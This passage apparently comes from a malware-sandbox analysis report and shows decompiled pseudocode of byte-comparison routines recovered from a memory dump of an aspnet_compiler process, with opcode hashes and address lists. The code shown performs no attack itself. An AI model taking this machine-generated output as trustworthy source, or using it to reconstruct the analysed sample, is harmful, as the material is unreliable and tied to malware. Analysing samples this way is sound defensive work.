                										if(_t241 != 0) {
                											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                										}
                										goto L48;
                									}
                									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
                									if(_t241 != 0) {
                										goto L2;
                									}
                									goto L45;
                								}
                								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
                								if(_t241 != 0) {
                									goto L2;
                								}
                								goto L43;
                							}
                							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
                							if(_t241 != 0) {
                								goto L2;
                							}
                							goto L41;
                						}
                						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
                						if(_t316 == 0) {
                							L30:
                							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
                							if(_t318 == 0) {
                								L32:
                								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
                								if(_t320 == 0) {
                									L34:
                									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
                									if(_t241 != 0) {
                										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                									}
                									goto L37;
                								}
                								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
                								if(_t241 != 0) {
                									goto L2;
                								}
                								goto L34;
                							}
                							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
                							if(_t241 != 0) {
                								goto L2;
                							}
                							goto L32;
                						}
                						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
                						if(_t241 != 0) {
                							goto L2;
                						}
                						goto L30;
                					}
                					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
                					if(_t322 == 0) {
                						L19:
                						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
                						if(_t324 == 0) {
                							L21:
                							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
                							if(_t326 == 0) {
                								L23:
                								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
                								if(_t241 != 0) {
                									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                								}
                								goto L26;
                							}
                							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
                							if(_t241 != 0) {
                								goto L2;
                							}
                							goto L23;
                						}
                						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
                						if(_t241 != 0) {
                							goto L2;
                						}
                						goto L21;
                					}
                					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
                					if(_t241 != 0) {
                						goto L2;
                					}
                					goto L19;
                				} else {
                					__edi = __al & 0x000000ff;
                					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
                					if(__edi == 0) {
                						L8:
                						__edi =  *(__esi - 0x1d) & 0x000000ff;
                						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                						if(__edi == 0) {
                							L10:
                							__edi =  *(__esi - 0x1c) & 0x000000ff;
                							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                							if(__edi == 0) {
                								L12:
                								__ecx =  *(__esi - 0x1b) & 0x000000ff;
                								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
                								if(__ecx != 0) {
                									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                								}
                								goto L15;
                							}
                							0 = 0 | __edi > 0x00000000;
                							__ecx = (__edi > 0) * 2 != 1;
                							if((__edi > 0) * 2 != 1) {
                								L2:
                								_t192 = _t241;
                								return _t192;
                							}
                							goto L12;
                						}
                						0 = 0 | __edi > 0x00000000;
                						__ecx = (__edi > 0) * 2 != 1;
                						if((__edi > 0) * 2 != 1) {
                							goto L2;
                						}
                						goto L10;
                					}
                					0 = 0 | __edi > 0x00000000;
                					__ecx = (__edi > 0) * 2 != 1;
                					if((__edi > 0) * 2 != 1) {
                						goto L2;
                					}
                					goto L8;
                				}
                			}

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                • Instruction ID: cdb42f118382171dd6da90fa2902f7a3e49d7853cbb1e863012291fa1a79d2cc
                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                • Instruction Fuzzy Hash: 06C1B5322050931ADF2D4639893403FBAA15EA57B171BA75FD4B3CB2C5FE28C538D624
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00436A38(void* __edx, void* __esi) {
                				signed int _t197;
                				signed char _t198;
                				signed char _t199;
                				signed char _t200;
                				signed char _t202;
                				signed char _t203;
                				signed int _t246;
                				void* _t294;
                				void* _t297;
                				void* _t299;
                				void* _t301;
                				void* _t303;
                				void* _t305;
                				void* _t307;
                				void* _t309;
                				void* _t311;
                				void* _t313;
                				void* _t315;
                				void* _t317;
                				void* _t319;
                				void* _t321;
                				void* _t323;
                				void* _t325;
                				void* _t327;
                				void* _t329;
                				void* _t331;
                				void* _t333;
                				void* _t335;
                				void* _t336;
                
                				_t336 = __esi;
                				_t294 = __edx;
                				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
                					_t246 = 0;
                					L14:
                					if(_t246 != 0) {
                						goto L1;
                					}
                					_t198 =  *(_t336 - 0x1b);
                					if(_t198 ==  *(_t294 - 0x1b)) {
                						_t246 = 0;
                						L25:
                						if(_t246 != 0) {
                							goto L1;
                						}
                						_t199 =  *(_t336 - 0x17);
                						if(_t199 ==  *(_t294 - 0x17)) {
                							_t246 = 0;
                							L36:
                							if(_t246 != 0) {
                								goto L1;
                							}
                							_t200 =  *(_t336 - 0x13);
                							if(_t200 ==  *(_t294 - 0x13)) {
                								_t246 = 0;
                								L47:
                								if(_t246 != 0) {
                									goto L1;
                								}
                								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
                									_t246 = 0;
                									L58:
                									if(_t246 != 0) {
                										goto L1;
                									}
                									_t202 =  *(_t336 - 0xb);
                									if(_t202 ==  *(_t294 - 0xb)) {
                										_t246 = 0;
                										L69:
                										if(_t246 != 0) {
                											goto L1;
                										}
                										_t203 =  *(_t336 - 7);
                										if(_t203 ==  *(_t294 - 7)) {
                											_t246 = 0;
                											L80:
                											if(_t246 != 0) {
                												goto L1;
                											}
                											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
                											if(_t297 == 0) {
                												L83:
                												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
                												if(_t299 == 0) {
                													L3:
                													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
                													if(_t246 != 0) {
                														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                													}
                													goto L1;
                												}
                												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
                												if(_t246 != 0) {
                													goto L1;
                												} else {
                													goto L3;
                												}
                											}
                											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
                											if(_t246 != 0) {
                												goto L1;
                											}
                											goto L83;
                										}
                										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
                										if(_t301 == 0) {
                											L73:
                											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
                											if(_t303 == 0) {
                												L75:
                												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
                												if(_t305 == 0) {
                													L77:
                													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
                													if(_t246 != 0) {
                														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                													}
                													goto L80;
                												}
                												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
                												if(_t246 != 0) {
                													goto L1;
                												}
                												goto L77;
                											}
                											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
                											if(_t246 != 0) {
                												goto L1;
                											}
                											goto L75;
                										}
                										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
                										if(_t246 != 0) {
                											goto L1;
                										}
                										goto L73;
                									}
                									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
                									if(_t307 == 0) {
                										L62:
                										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
                										if(_t309 == 0) {
                											L64:
                											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
                											if(_t311 == 0) {
                												L66:
                												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
                												if(_t246 != 0) {
                													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                												}
                												goto L69;
                											}
                											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
                											if(_t246 != 0) {
                												goto L1;
                											}
                											goto L66;
                										}
                										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
                										if(_t246 != 0) {
                											goto L1;
                										}
                										goto L64;
                									}
                									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
                									if(_t246 != 0) {
                										goto L1;
                									}
                									goto L62;
                								}
                								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
                								if(_t313 == 0) {
                									L51:
                									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
                									if(_t315 == 0) {
                										L53:
                										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
                										if(_t317 == 0) {
                											L55:
                											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
                											if(_t246 != 0) {
                												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                											}
                											goto L58;
                										}
                										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
                										if(_t246 != 0) {
                											goto L1;
                										}
                										goto L55;
                									}
                									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
                									if(_t246 != 0) {
                										goto L1;
                									}
                									goto L53;
                								}
                								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
                								if(_t246 != 0) {
                									goto L1;
                								}
                								goto L51;
                							}
                							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
                							if(_t319 == 0) {
                								L40:
                								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
                								if(_t321 == 0) {
                									L42:
                									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
                									if(_t323 == 0) {
                										L44:
                										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
                										if(_t246 != 0) {
                											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                										}
                										goto L47;
                									}
                									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
                									if(_t246 != 0) {
                										goto L1;
                									}
                									goto L44;
                								}
                								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
                								if(_t246 != 0) {
                									goto L1;
                								}
                								goto L42;
                							}
                							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
                							if(_t246 != 0) {
                								goto L1;
                							}
                							goto L40;
                						}
                						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
                						if(_t325 == 0) {
                							L29:
                							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
                							if(_t327 == 0) {
                								L31:
                								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
                								if(_t329 == 0) {
                									L33:
                									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
                									if(_t246 != 0) {
                										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                									}
                									goto L36;
                								}
                								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
                								if(_t246 != 0) {
                									goto L1;
                								}
                								goto L33;
                							}
                							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
                							if(_t246 != 0) {
                								goto L1;
                							}
                							goto L31;
                						}
                						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
                						if(_t246 != 0) {
                							goto L1;
                						}
                						goto L29;
                					}
                					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
                					if(_t331 == 0) {
                						L18:
                						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
                						if(_t333 == 0) {
                							L20:
                							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
                							if(_t335 == 0) {
                								L22:
                								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
                								if(_t246 != 0) {
                									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                								}
                								goto L25;
                							}
                							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
                							if(_t246 != 0) {
                								goto L1;
                							}
                							goto L22;
                						}
                						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
                						if(_t246 != 0) {
                							goto L1;
                						}
                						goto L20;
                					}
                					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
                					if(_t246 != 0) {
                						goto L1;
                					}
                					goto L18;
                				} else {
                					__edi =  *(__esi - 0x1f) & 0x000000ff;
                					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
                					if(__edi == 0) {
                						L7:
                						__edi =  *(__esi - 0x1e) & 0x000000ff;
                						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
                						if(__edi == 0) {
                							L9:
                							__edi =  *(__esi - 0x1d) & 0x000000ff;
                							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                							if(__edi == 0) {
                								L11:
                								__ecx =  *(__esi - 0x1c) & 0x000000ff;
                								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                								if(__ecx != 0) {
                									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                								}
                								goto L14;
                							}
                							0 = 0 | __edi > 0x00000000;
                							__ecx = (__edi > 0) * 2 != 1;
                							if((__edi > 0) * 2 != 1) {
                								goto L1;
                							}
                							goto L11;
                						}
                						0 = 0 | __edi > 0x00000000;
                						__ecx = (__edi > 0) * 2 != 1;
                						if((__edi > 0) * 2 != 1) {
                							goto L1;
                						}
                						goto L9;
                					}
                					0 = 0 | __edi > 0x00000000;
                					__ecx = (__edi > 0) * 2 != 1;
                					if((__edi > 0) * 2 != 1) {
                						goto L1;
                					}
                					goto L7;
                				}
                				L1:
                				_t197 = _t246;
                				return _t197;
                			}

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                • Instruction ID: e4845fd6f3ec705c7f029f6006d4d019cd45b72a32bdd236f80440e8df792853
                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                • Instruction Fuzzy Hash: 26C194322050A31ADF2D4639C93403FFAA15A967B171BA76ED4B2CB2C5FE18D538D624
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004361CE(void* __edx, void* __esi) {
                				signed int _t184;
                				signed char _t185;
                				signed char _t186;
                				signed char _t187;
                				signed char _t188;
                				signed char _t190;
                				signed int _t231;
                				void* _t275;
                				void* _t278;
                				void* _t280;
                				void* _t282;
                				void* _t284;
                				void* _t286;
                				void* _t288;
                				void* _t290;
                				void* _t292;
                				void* _t294;
                				void* _t296;
                				void* _t298;
                				void* _t300;
                				void* _t302;
                				void* _t304;
                				void* _t306;
                				void* _t308;
                				void* _t310;
                				void* _t312;
                				void* _t313;
                
                				_t313 = __esi;
                				_t275 = __edx;
                				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
                					_t231 = 0;
                					L11:
                					if(_t231 != 0) {
                						goto L1;
                					}
                					_t185 =  *(_t313 - 0x19);
                					if(_t185 ==  *(_t275 - 0x19)) {
                						_t231 = 0;
                						L22:
                						if(_t231 != 0) {
                							goto L1;
                						}
                						_t186 =  *(_t313 - 0x15);
                						if(_t186 ==  *(_t275 - 0x15)) {
                							_t231 = 0;
                							L33:
                							if(_t231 != 0) {
                								goto L1;
                							}
                							_t187 =  *(_t313 - 0x11);
                							if(_t187 ==  *(_t275 - 0x11)) {
                								_t231 = 0;
                								L44:
                								if(_t231 != 0) {
                									goto L1;
                								}
                								_t188 =  *(_t313 - 0xd);
                								if(_t188 ==  *(_t275 - 0xd)) {
                									_t231 = 0;
                									L55:
                									if(_t231 != 0) {
                										goto L1;
                									}
                									if( *(_t313 - 9) ==  *(_t275 - 9)) {
                										_t231 = 0;
                										L66:
                										if(_t231 != 0) {
                											goto L1;
                										}
                										_t190 =  *(_t313 - 5);
                										if(_t190 ==  *(_t275 - 5)) {
                											_t231 = 0;
                											L77:
                											if(_t231 == 0) {
                												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
                												if(_t231 != 0) {
                													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                												}
                											}
                											goto L1;
                										}
                										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
                										if(_t278 == 0) {
                											L70:
                											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
                											if(_t280 == 0) {
                												L72:
                												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
                												if(_t282 == 0) {
                													L74:
                													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
                													if(_t231 != 0) {
                														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                													}
                													goto L77;
                												}
                												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
                												if(_t231 != 0) {
                													goto L1;
                												}
                												goto L74;
                											}
                											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
                											if(_t231 != 0) {
                												goto L1;
                											}
                											goto L72;
                										}
                										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
                										if(_t231 != 0) {
                											goto L1;
                										}
                										goto L70;
                									}
                									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
                									if(_t284 == 0) {
                										L59:
                										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
                										if(_t286 == 0) {
                											L61:
                											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
                											if(_t288 == 0) {
                												L63:
                												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
                												if(_t231 != 0) {
                													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                												}
                												goto L66;
                											}
                											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
                											if(_t231 != 0) {
                												goto L1;
                											}
                											goto L63;
                										}
                										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
                										if(_t231 != 0) {
                											goto L1;
                										}
                										goto L61;
                									}
                									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
                									if(_t231 != 0) {
                										goto L1;
                									}
                									goto L59;
                								}
                								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
                								if(_t290 == 0) {
                									L48:
                									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
                									if(_t292 == 0) {
                										L50:
                										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
                										if(_t294 == 0) {
                											L52:
                											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
                											if(_t231 != 0) {
                												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                											}
                											goto L55;
                										}
                										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
                										if(_t231 != 0) {
                											goto L1;
                										}
                										goto L52;
                									}
                									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
                									if(_t231 != 0) {
                										goto L1;
                									}
                									goto L50;
                								}
                								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
                								if(_t231 != 0) {
                									goto L1;
                								}
                								goto L48;
                							}
                							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
                							if(_t296 == 0) {
                								L37:
                								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
                								if(_t298 == 0) {
                									L39:
                									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
                									if(_t300 == 0) {
                										L41:
                										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
                										if(_t231 != 0) {
                											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                										}
                										goto L44;
                									}
                									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
                									if(_t231 != 0) {
                										goto L1;
                									}
                									goto L41;
                								}
                								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
                								if(_t231 != 0) {
                									goto L1;
                								}
                								goto L39;
                							}
                							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
                							if(_t231 != 0) {
                								goto L1;
                							}
                							goto L37;
                						}
                						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
                						if(_t302 == 0) {
                							L26:
                							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
                							if(_t304 == 0) {
                								L28:
                								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
                								if(_t306 == 0) {
                									L30:
                									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
                									if(_t231 != 0) {
                										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                									}
                									goto L33;
                								}
                								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
                								if(_t231 != 0) {
                									goto L1;
                								}
                								goto L30;
                							}
                							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
                							if(_t231 != 0) {
                								goto L1;
                							}
                							goto L28;
                						}
                						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
                						if(_t231 != 0) {
                							goto L1;
                						}
                						goto L26;
                					}
                					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
                					if(_t308 == 0) {
                						L15:
                						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
                						if(_t310 == 0) {
                							L17:
                							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
                							if(_t312 == 0) {
                								L19:
                								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
                								if(_t231 != 0) {
                									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                								}
                								goto L22;
                							}
                							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
                							if(_t231 != 0) {
                								goto L1;
                							}
                							goto L19;
                						}
                						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
                						if(_t231 != 0) {
                							goto L1;
                						}
                						goto L17;
                					}
                					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
                					if(_t231 != 0) {
                						goto L1;
                					}
                					goto L15;
                				} else {
                					__edi = __al & 0x000000ff;
                					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                					if(__edi == 0) {
                						L4:
                						__edi =  *(__esi - 0x1c) & 0x000000ff;
                						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                						if(__edi == 0) {
                							L6:
                							__edi =  *(__esi - 0x1b) & 0x000000ff;
                							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
                							if(__edi == 0) {
                								L8:
                								__ecx =  *(__esi - 0x1a) & 0x000000ff;
                								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
                								if(__ecx != 0) {
                									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                								}
                								goto L11;
                							}
                							0 = 0 | __edi > 0x00000000;
                							__ecx = (__edi > 0) * 2 != 1;
                							if((__edi > 0) * 2 != 1) {
                								goto L1;
                							}
                							goto L8;
                						}
                						0 = 0 | __edi > 0x00000000;
                						__ecx = (__edi > 0) * 2 != 1;
                						if((__edi > 0) * 2 != 1) {
                							goto L1;
                						}
                						goto L6;
                					}
                					0 = 0 | __edi > 0x00000000;
                					__ecx = (__edi > 0) * 2 != 1;
                					if((__edi > 0) * 2 != 1) {
                						goto L1;
                					}
                					goto L4;
                				}
                				L1:
                				_t184 = _t231;
                				return _t184;
                			}
                0x00000000
                0x00000000
                0x00436441
                0x00436396
                0x00436398
                0x004363b0
                0x004363b8
                0x004363ba
                0x004363d2
                0x004363da
                0x004363dc
                0x004363f4
                0x004363fc
                0x004363fe
                0x00436407
                0x00436407
                0x00000000
                0x004363fe
                0x004363e5
                0x004363ee
                0x00000000
                0x00000000
                0x00000000
                0x004363ee
                0x004363c3
                0x004363cc
                0x00000000
                0x00000000
                0x00000000
                0x004363cc
                0x004363a1
                0x004363aa
                0x00000000
                0x00000000
                0x00000000
                0x004363aa
                0x004362ff
                0x00436301
                0x00436319
                0x00436321
                0x00436323
                0x0043633b
                0x00436343
                0x00436345
                0x0043635d
                0x00436365
                0x00436367
                0x00436370
                0x00436370
                0x00000000
                0x00436367
                0x0043634e
                0x00436357
                0x00000000
                0x00000000
                0x00000000
                0x00436357
                0x0043632c
                0x00436335
                0x00000000
                0x00000000
                0x00000000
                0x00436335
                0x0043630a
                0x00436313
                0x00000000
                0x00000000
                0x00000000
                0x00436313
                0x00436268
                0x0043626a
                0x00436282
                0x0043628a
                0x0043628c
                0x004362a4
                0x004362ac
                0x004362ae
                0x004362c6
                0x004362ce
                0x004362d0
                0x004362d9
                0x004362d9
                0x00000000
                0x004362d0
                0x004362b7
                0x004362c0
                0x00000000
                0x00000000
                0x00000000
                0x004362c0
                0x00436295
                0x0043629e
                0x00000000
                0x00000000
                0x00000000
                0x0043629e
                0x00436273
                0x0043627c
                0x00000000
                0x00000000
                0x00000000
                0x004361d6
                0x004361d6
                0x004361dd
                0x004361df
                0x004361f3
                0x004361f3
                0x004361fb
                0x004361fd
                0x00436211
                0x00436211
                0x00436219
                0x0043621b
                0x0043622f
                0x0043622f
                0x00436237
                0x00436239
                0x00436242
                0x00436242
                0x00000000
                0x00436239
                0x00436221
                0x00436224
                0x0043622d
                0x00000000
                0x00000000
                0x00000000
                0x0043622d
                0x00436203
                0x00436206
                0x0043620f
                0x00000000
                0x00000000
                0x00000000
                0x0043620f
                0x004361e5
                0x004361e8
                0x004361f1
                0x00000000
                0x00000000
                0x00000000
                0x004361f1
                0x004361c6
                0x004361c6
                0x00436fb7

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                • Instruction ID: c4f57d891009220d5e87c960dee6aaef52858562a4a94721daf6ec7dd3fe307b
                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                • Instruction Fuzzy Hash: 15C195322051931ADF2D4639893403FBAB15AA57B171BA76FD8B3CB2C5FE18C538D624
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00435DB6(void* __edx, void* __esi) {
                				signed char _t177;
                				void* _t178;
                				signed char _t179;
                				signed char _t180;
                				signed char _t181;
                				signed char _t183;
                				signed char _t184;
                				void* _t228;
                				void* _t278;
                				void* _t281;
                				void* _t283;
                				void* _t285;
                				void* _t287;
                				void* _t289;
                				void* _t291;
                				void* _t293;
                				void* _t295;
                				void* _t297;
                				void* _t299;
                				void* _t301;
                				void* _t303;
                				void* _t305;
                				void* _t307;
                				void* _t309;
